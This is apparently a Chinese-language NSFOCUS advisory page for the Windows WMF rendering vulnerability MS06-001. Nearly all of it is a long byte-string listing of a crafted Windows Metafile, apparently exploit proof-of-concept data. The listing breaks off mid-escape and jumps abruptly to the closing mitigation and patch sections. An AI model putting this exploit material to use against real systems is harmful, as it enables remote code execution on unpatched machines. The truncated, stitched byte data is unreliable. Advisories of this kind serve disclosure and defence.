"\x00\x0e\x00\x11\x00\x06\x00\x0e\x00\x0f\x00\x11\x00\x04\x00\x00".
"\x00\x1f\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00".
"\xd0\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00".
"\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01".
"\x00\x10\x00\x00\x00\x32\x0a\x42\x00\x96\x02\x06\x00\x00\x00\x71".
"\x71\x71\x71\x71\x71\x0c\x00\x06\x00\x0b\x00\x0b\x00\x08\x00\x0a".
"\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02".
"\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14".
"\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00".
"\x00\x02\x01\x01\x00\x16\x00\x00\x00\x32\x0a\x5b\x00\xd2\x01\x0a".
"\x00\xd0\x00\x71\x71\x71\x71\x20\x3d\x20\x71\x71\x71\x13\x00\x0e".
"\x00\x11\x00\x11\x00\x05\x00\x0c\x00\x06\x00\x14\x00\x0e\x00\x11".
"\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x7c".
"\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14".
"\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x0a\x00".
"\x00\x02\x01\x01\x00\x10\x00\x00\x00\x32\x0a\x5b\x00\x65\x02\x06".
"\x00\x00\x00\x71\x71\x71\x71\x71\x71\x0c\x00\x05\x00\x0b\x00\x0b".
"\x00\x08\x00\x0a\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00".
"\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\x2e\x02\x05".
"\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18".
"\x00\x04\x00\x00\x00\x02\x01\x01\x00\x3d\x00\x00\x00\x32\x0a\x75".
"\x00\xd2\x01\x24\x00\x00\x00\x71\x71\x71\x71\x71\x71\x71\x71\x71".
"\x71\x71\x71\x71\x71\x71\x71\x71\x71\x71\x71\x71\x71\x71\x71\x71".
"\x71\x71\x71\x71\x71\x71\x71\x71\x20\x42\x20\x0f\x00\x0e\x00\x05".
"\x00\x0b\x00\x0b\x00\x0c\x00\x0b\x00\x0b\x00\x05\x00\x0f\x00\x05".
"\x00\x0c\x00\x06\x00\x0b\x00\x0b\x00\x0b\x00\x05\x00\x0a\x00\x0c".
"\x00\x08\x00\x05\x00\x07\x00\x0b\x00\x0a\x00\x07\x00\x0c\xd4\x08".
"\x00\x06\x00\x0b\x00\x0b\x00\x0c\x00\x0b\x00\x0b\x00\x05\x00\x0f".
"\x00\x05\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02".
"\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00".
"\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04".
"\x00\x00\x00\x02\x01\x01\x00\x2e\x00\x00\x00\x32\x0a\x8f\x00\xd2".
"\x01\x17\x00\x00\x00\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65".
"\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x20\x0f".
"\x00\x10\x00\x0e\x00\x05\x00\x0c\x00\x06\x00\x0b\x00\x0b\x00\x08".
"\x00\x0b\x00\x0a\x00\x05\x00\x0b\x00\x08\x00\x0b\x00\x0f\x00\x08".
"\x00\x0c\x00\x05\x00\x07\x00\x0b\x00\x0a\x00\x07\x00\x0b\x00\x09".
"\x00\x05\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02".
"\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x82\x00".
"\x00\x14\x02\x00\xf4\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04".
"\x00\x00\x00\x02\x01\x01\x00\x0a\x00\x00\x00\x32\x0a\xa8\x00\xd2".
"\x01\x02\x00\x00\x00\x50\x49\x0e\x00\x07\x00\x04\x00\x00\x00\x2e".
"\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09".
"\x02\xff\xff\xff\x02\x05\xe5\x00\x00\x14\x02\x00\x00\x00\x00\x04".
"\x00\x00\x00\x2e\x01\x18\x00\x04\xf3\x00\x00\x02\x01\x01\x00\x35".
"\x00\x00\x00\x32\x0a\xa8\x00\xe7\x01\x01\x00\x00\x00\x2d\x00\x07".
"\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02".
"\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x1d\x00\x00\x00\x14".
"\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00".
"\x00\x02\x01\x01\x00\x09\x00\x00\x00\x32\x0a\xa8\x00\xee\x01\x01".
"\x00\x00\x00\x33\x00\x0b\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04".
"\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff".
"\x02\x05\x43\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e".
"\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x10\x00\x00\x00\x32".
"\x0a\xa8\x00\xfe\x01\x06\x00\x00\x00\x65\x65\x65\x65\x65\x65\x0c".
"\x00\x06\x00\x0b\x00\x0b\x00\x08\x00\x0a\x00\x04\x00\x00\x00\x2e".
"\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09".
"\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04".
"\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x09".
"\x00\x00\x00\x32\x0a\xa8\x00\x3d\x02\x01\x00\x00\x00\x3d\x00\x0c".
"\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02".
"\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14".
"\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00".
"\x00\x02\x01\x01\x00\x25\x00\x00\x00\x32\x0a\xa8\x00\x4f\x02\x14".
"\x00\x00\x00\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65".
"\x65\x65\x65\x65\x65\x65\x65\x0c\x00\x0b\x00\x0b\x00\x09\x00\x0c".
"\x00\x0b\x00\x0b\x00\x08\x00\x05\x00\x0c\x00\x0b\xb9\x06\x00\x06".
"\x00\x0b\x00\x0b\x00\x09\x00\x05\x00\x07\x00\x0c\x00\x05\x00\x04".
"\x4b\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05".
"\x00\x00\x00\x09\x02\xff\xff\xff\x38\x05\x00\x00\x00\x14\x02\x00".
"\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02".
"\x01\x01\x00\x09\x00\x00\x00\x32\x0a\xa8\x00\x08\x03\x01\x00\x00".
"\x00\x7e\x00\x07\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00".
"\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05".
"\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18".
"\x00\x04\x00\x00\x00\x02\x01\x01\x00\x09\x00\x00\x00\x32\x0a\xa8".
"\x00\x0f\x03\x01\x00\x00\x00\x33\x00\x0b\x00\x04\x00\x00\x00\x2e".
"\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09".
"\x02\xff\xff\xff\x9e\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04".
"\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x10".
"\x00\x00\x00\x32\x0a\xa8\x00\x20\x03\x06\x00\x00\x00\x65\x65\x65".
"\x65\x65\xfa\x0c\x00\x06\x00\x0b\x00\x0b\x00\x08\x00\x0a\x00\x04".
"\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05".
"\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00".
"\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02".
"\x01\x01\x00\x22\x00\x00\x00\x32\x0a\xc2\x00\xd2\x01\x12\x00\x00".
"\x00\x50\x4b\x42\x2c\x20\x65\x65\x65\x20\x3d\x20\x65\x65\x65\x65".
"\x65\x65\x65\x0e\x00\x10\x00\x0f\x00\x05\x00\x04\x00\x0e\x00\x11".
"\x00\x0f\x00\x05\x00\x0c\x00\x05\x00\x0c\x00\x08\x00\x0b\x00\x93".
"\x00\x0b\x00\x06\x00\x0b\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04".
"\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff".
"\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e".
"\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x10\x00\x00\x00\x32".
"\x0a\xc2\x00\x94\x02\x06\x00\x00\x00\x65\x65\x65\x65\x65\x65\x0c".
"\x00\x06\x00\x0b\x00\x0b\x00\x08\x00\x0a\x00\x04\x00\x00\x00\x2e".
"\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\xd2".
"\x02\xff\xff\x2f\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04".
"\x00\x00\x00\x2e\x01\x18\xce\x04\x00\x00\x00\x02\x01\x01\x00\x13".
"\x00\x00\x00\x32\x0a\xc2\x00\xd3\x02\x08\x00\x00\x00\x65\x65\x65".
"\x65\x65\x20\x43\x20\x0f\x00\x05\x00\x0b\x00\x0b\x00\x0c\x00\x05".
"\x00\x0f\x00\x05\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00".
"\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05".
"\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18".
"\x00\x04\x00\x00\x00\x02\x01\x01\x00\x18\x00\x00\x00\x32\x0a\xdc".
"\x00\xd2\x01\x0b\x00\x00\x21\x65\x65\x65\x65\x65\x20\x3d\x20\x65".
"\x65\x65\x00\x0f\x00\x10\x00\x07\x00\x10\x00\x0f\x00\x05\x00\x0c".
"\x00\x06\x00\x10\x00\x07\x00\x0e\x00\x04\x00\x00\x00\x2e\x01\x01".
"\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x60\x02\xff".
"\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00".
"\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x09\x00\x00".
"\x8f\x32\x0a\xdc\xd3\x53\x02\x01\x00\x00\x9e\xb9\x00\x07\x00\x04".
"\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\xda\x02\x00\x05".
"\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00".
"\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02".
"\x01\x01\x00\x1c\x00\x00\x00\x32\x0a\xc6\x00\x5a\x02\x0e\x00\x00".
"\x00\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x20\x49\x44\x48\x0b".
"\x00\x08\x00\x08\x00\x0b\x00\x0a\x00\x05\x00\x0b\x00\x07\x00\x0a".
"\x00\x0b\x00\x06\x00\x08\x00\x10\x00\x10\x00\x04\x00\x00\x00\x2e".
"\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09".
"\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04".
"\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x83\x01\x01\x00\x09".
"\x00\x00\x00\x32\x0a\xdc\x00\xe4\x02\x01\x00\x00\x00\x2d\x00\x07".
"\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02".
"\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14".
"\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00".
"\x9b\x02\x01\x01\x00\x0a\x00\x00\x00\x32\x0a\xdc\x00\xeb\x02\x02".
"\x00\x00\x00\x31\x2f\x0b\x00\x06\x00\x04\x00\x00\x00\x2e\x01\x01".
"\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff".
"\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x71\x00\x00\x04\x00\x00".
"\x00\x2e\x01\x5d\x00\x04\x00\x00\x00\x02\x01\x01\x00\x0c\x00\x00".
"\x00\x32\x0a\xdc\x00\xfc\x02\x03\x00\x00\x00\x43\x65\x64\x00\x0f".
"\x00\x0a\x00\x0b\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x28\x00\x00".
"\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05".
"\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18".
"\x00\x04\x00\x00\x00\x02\x01\x01\x00\x09\x00\x00\x00\x32\x0a\xdc".
"\x00\x20\x03\x01\x00\x00\x00\x2d\x00\x07\x00\x04\x00\x00\x00\x2e".
"\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09".
"\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04".
"\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x09".
"\x00\x00\x00\x32\xd0\xdc\x00\x27\x03\x01\x00\x00\x00\x33\x00\x0b".
"\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02".
"\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14".
"\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00".
"\x00\x02\x01\x01\x00\x09\x00\x00\x00\x32\x0a\xdc\x00\x32\x03\x01".
"\x00\x00\x00\x2d\x00\x67\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04".
"\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff".
"\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e".
"\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x37\x00\x00\x00\x32".
"\x0a\xf5\x00\xd2\x01\x20\x00\x00\x00\x65\x65\x65\x65\x65\x65\x65".
"\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x6e".
"\x20\x65\x1e\x65\x65\x65\x65\x65\x20\x0b\x00\x0b\x00\x11\x00\x0c".
"\x00\x05\x00\x0b\x00\x0b\x00\x0b\x00\x0b\x00\x08\x00\x06\x00\x0b".
"\x00\x0a\x00\x0b\x00\x07\x00\x79\x00\x06\x00\x0b\x00\x0b\x00\x11".
"\x00\x0c\x00\x06\x00\x0b\x00\x06\x00\x0c\x00\x08\x00\x0b\x00\x07".
"\x00\x0b\x00\x05\x00\x0c\x00\x05\x00\x04\x00\x00\x00\x2e\x01\x01".
"\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff".
"\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00".
"\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x10\x00\x00".
"\x00\x32\x0a\x11\x01\xd2\x01\x06\x00\x00\x00\x52\x49\x50\x20\x3d".
"\x20\x10\x00\x07\x00\x0e\x00\x05\x00\x0c\x00\x05\x00\x04\x00\x00".
"\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x15\x00\x00".
"\x00\xfb\x02\xe8\xff\x00\x00\x00\x00\x00\x00\xbc\x02\x00\x00\x00".
"\x00\x00\x40\x00\x00\x54\x69\x6d\x65\x73\x20\x4e\x65\x77\x20\x52".
"\x6f\x6d\x61\x6e\x00\x00\x11\x04\x00\x00\x00\x2d\x01\xa7\x00\x04".
"\x00\x00\x00\xf0\x01\x03\x00\x05\x00\x00\x00\x8d\x02\xff\xff\xff".
"\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e".
"\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x13\x00\x00\x00\x32".
"\x0a\x11\x01\x0d\x02\x08\x00\x00\x00\x72\x65\x63\x65\x70\x74\x6f".
"\x72\x0b\x00\x0b\x00\x0b\x00\x0b\x00\x0d\x00\x08\x00\x0c\x00\x0b".
"\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02".
"\x00\x15\x00\x00\x00\xfb\x02\xeb\xff\x00\x00\x00\x00\x00\x00\xbc".
"\x02\x00\x00\x00\x00\x00\x40\x00\x00\x54\x69\x6d\x65\x73\x20\x4e".
"\x65\x77\x20\x52\x6f\x6d\x61\x6e\x00\x00\x11\x04\x00\x00\x00\x2d".
"\x01\x03\x00\x04\x00\x00\x00\xf0\x01\x05\x00\x05\x00\x00\x00\x09".
"\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04".
"\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x09".
"\x00\x00\x00\x32\x0a\x11\x01\x65\x02\x01\x00\x00\x00\x2d\x00\x07".
"\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x50".
"\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14".
"\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00".
"\x00\x02\x01\x01\x00\x25\x00\x00\x00\x32\x0a\x11\x01\x6c\x02\x14".
"\x00\x00\x00\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65".
"\x65\x65\x65\x65\x65\x65\x20\x05\x00\x0b\x00\x07\x00\x0b\x00\x08".
"\x00\x0b\x00\x0a\x00\x08\x00\x05\x00\x0b\x00\x0b\x00\x06\x00\x0c".
"\x00\x08\x00\x0c\x00\x07\x41\x0a\x00\x06\x00\x0b\x00\x05\x00\x04".
"\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05".
"\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00".
"\x00\x00\x00\x04\x00\x00\x00\x2e\x01\xd5\x00\x04\x00\x00\x00\x02".
"\x01\x01\x00\x1b\x00\x00\x00\x32\x0a\x2c\x01\xd2\x01\x0d\x00\x00".
"\x00\x53\x41\x50\x4b\x20\x3d\x20\x65\x65\x65\x65\x65\x65\x00\x0c".
"\x00\x0f\x00\x0e\x00\x11\xb0\x05\x00\x0c\x00\x05\x00\x08\x00\x08".
"\x00\x08\x00\x0a\x00\x08\x00\x08\x00\x04\x00\x00\x00\x2e\x01\x01".
"\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xd0".
"\xff\xff\x02\x05\x00\x9d\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00".
"\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x2b\x01\x01\x00\x09\x00\x00".
"\x00\x32\x0a\x47\x01\x54\x02\x01\x00\x00\x00\x2d\x00\x07\x00\x04".
"\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05".
"\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00".
"\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02".
"\x01\x01\x00\x21\x00\x00\x00\x32\x0a\x2c\x01\x5b\x02\x11\x00\x00".
"\x00\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65".
"\x65\x65\x00\x0b\x00\x0a\x00\x07\x00\x05\x00\x0b\x00\x0b\x00\x07".
"\x00\x0a\x84\x0b\x00\x06\x00\x0c\x00\x08\x00\x0c\x00\x07\x00\x0a".
"\x00\x06\x00\x0b\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00".
"\x00\x02\x01\x02\x00\x4d\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05".
"\x36\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18".
"\x00\x04\x00\x00\x00\x02\x01\x01\x00\x10\x00\x00\x00\x32\x0a\x2c".
"\x01\xfc\x02\x06\x00\x00\x00\x65\x65\x65\x65\x65\x65\x0c\x00\x06".
"\x00\x0b\x00\x0b\x00\x08\x00\x0a\x00\x04\x00\x00\x00\x2e\x01\x01".
"\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff".
"\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00".
"\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x1c\x00\x00".
"\x00\x32\x0a\x45\x01\xd2\x01\x0e\x00\x00\x00\x65\x65\x65\x9e\x3d".
"\x20\x65\x65\x65\x65\x65\x65\x65\x65\x0c\x00\x0e\x00\x11\x00\x05".
"\x00\x0c\x00\x05\x00\x0c\x00\x0f\x00\x0e\x00\x11\x00\x06\x00\x0e".
"\x00\x0f\x00\x11\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00".
"\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05".
"\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18".
"\x00\x04\x00\x00\x00\x02\x01\x01\x00\x12\x00\x00\x00\x32\x0a\x45".
"\x01\x86\x02\x07\x00\x00\x00\x6b\x69\x6e\x61\x73\x65\x20\x00\x0c".
"\x00\x05\x00\x0b\x00\x0b\x00\x08\x00\x0a\x00\x05\x00\x04\x00\x00".
"\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00".
"\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x2e\x00\x00\x00".
"\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01".
"\x00\x0c\x00\x00\x00\x32\x0a\x5f\x01\xd2\x01\x03\x00\x00\x00\x54".
"\x64\x54\x00\x0e\x00\x0c\x00\x0d\x00\x04\x00\x00\x00\x2e\x01\x01".
"\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff".
"\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00".
"\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x16\x00\x00".
"\x00\x32\x0a\x5f\x01\xff\x01\x0a\x00\x00\x00\x3d\x20\x74\x65\x72".
"\x6d\x69\x6e\x61\x6c\x0c\x00\x05\x00\x07\x00\x0b\x00\x09\x00\x12".
"\x00\x06\x00\x0b\x00\x0b\x00\x06\x00\x43\x00\x00\x00\x2e\x01\x01".
"\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff".
"\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00".
"\x00\x2e\x01\x18\x00\x04\x80\x00\x00\x02\x01\x01\x00\x30\x00\x00".
"\x00\x32\x0a\x5f\x01\x65\x02\x1b\x00\x00\x00\x65\x65\x65\x65\x65".
"\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65".
"\x65\x65\x65\x65\x65\x65\x00\x0b\x00\x0a\x00\x0b\x00\x0a\x00\x0b".
"\x00\x0c\x00\x0b\x00\x0a\x00\x05\x00\x0a\x00\x0b\x00\x08\x00\x05".
"\xab\x0c\x00\x0b\x00\x05\x00\x08\x00\x08\x00\x0c\x00\x9e\x00\x08".
"\x00\x07\x00\x0b\x00\x08\x00\x0b\x00\x08\x00\x0a\x00\x04\x00\x00".
"\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00".
"\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00".
"\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01".
"\x00\x0f\x00\x00\x00\x32\x0a\x79\x01\xd2\x01\x05\x00\x00\x00\x54".
"\x4e\x46\x20\x3d\x00\x0d\x00\x0f\x00\x0e\x00\x05\x00\x0c\x00\x04".
"\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05".
"\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00".
"\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02".
"\x01\x01\x00\x0f\x00\x00\x00\x32\x0a\x79\x01\x12\x02\x05\x00\x00".
"\x00\x65\x65\x65\x65\x65\x00\x08\x00\x0c\x00\x11\x00\x0c\x00\x09".
"\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02".
"\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14".
"\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00".
"\x00\x02\x01\x01\x00\x1f\x00\x75\x00\x32\x0a\x79\x01\x51\x02\x10".
"\x00\x00\x00\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65".
"\x65\x65\x20\x0b\x00\x0a\x00\x0b\x00\x08\x00\x0b\x00\x09\x00\x05".
"\x00\x09\x00\x05\x00\x07\x00\x0b\x00\x0a\x00\x07\x00\x0b\x00\x09".
"\x00\x05\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02".
"\x01\x02\x00\x05\x00\x00\x00\
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 在Windows XP Service Pack 1、Windows XP Service Pack 2、Windows Server 2003和Windows Server 2003 Service Pack 1中注销Windows图形和传真查看器(Shimgvw.dll)。
厂商补丁:
Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS06-001)以及相应补丁:
MS06-001:Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution (912919)
链接:http://www.microsoft.com/technet/security/Bulletin/MS06-001.mspx
浏览次数:8500
严重程度:7(网友投票)
绿盟科技给您安全的保障